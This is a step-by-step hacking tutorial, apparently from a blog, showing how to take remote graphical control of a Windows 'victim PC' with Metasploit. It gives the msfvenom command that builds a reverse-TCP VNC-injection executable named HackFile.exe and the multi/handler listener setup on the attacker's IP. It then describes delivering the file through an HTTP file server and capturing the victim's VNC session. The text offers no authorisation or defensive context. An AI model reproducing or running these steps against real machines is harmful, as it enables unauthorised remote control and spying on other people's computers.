The Virtual Network Computing (VNC) is a graphical desktop sharing system that uses to remotely control another computer. We can inject a VNC server remotely using the Metasploit payload for the VNC injection. In this recipe, we will learn how to inject the VNC server remotely.
It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/
Step 1 :
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.18.132 lport=4466 -f exe > /root/Desktop/HackFile.exe
Step 2 : Open MetaSploit by using command msfconsole
Step 3 :
msf > use exploit/multi/handler
msf exploit (handler)>set payload windows/vncinject/reverse_tcp
msf exploit (handler)>set lhost 192.168.18.132
msf exploit (handler)>set lport 4466
msf exploit (handler)>run
Step 4 : Share a file with HFS (HTTP file Sever)
HFS(HTTP file Sever) is default installed in Latest kali linux,if not installed,visit our article
How to send or receive files in Kali Linux - Using HFS(HTTP File Server)
Step 5 : Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.
Step 6 : Now you have Successfully Injecting the VNC Server Remotely
Step 7 : we have Captured VNC Session of Remote Windows PC by Payloads Injection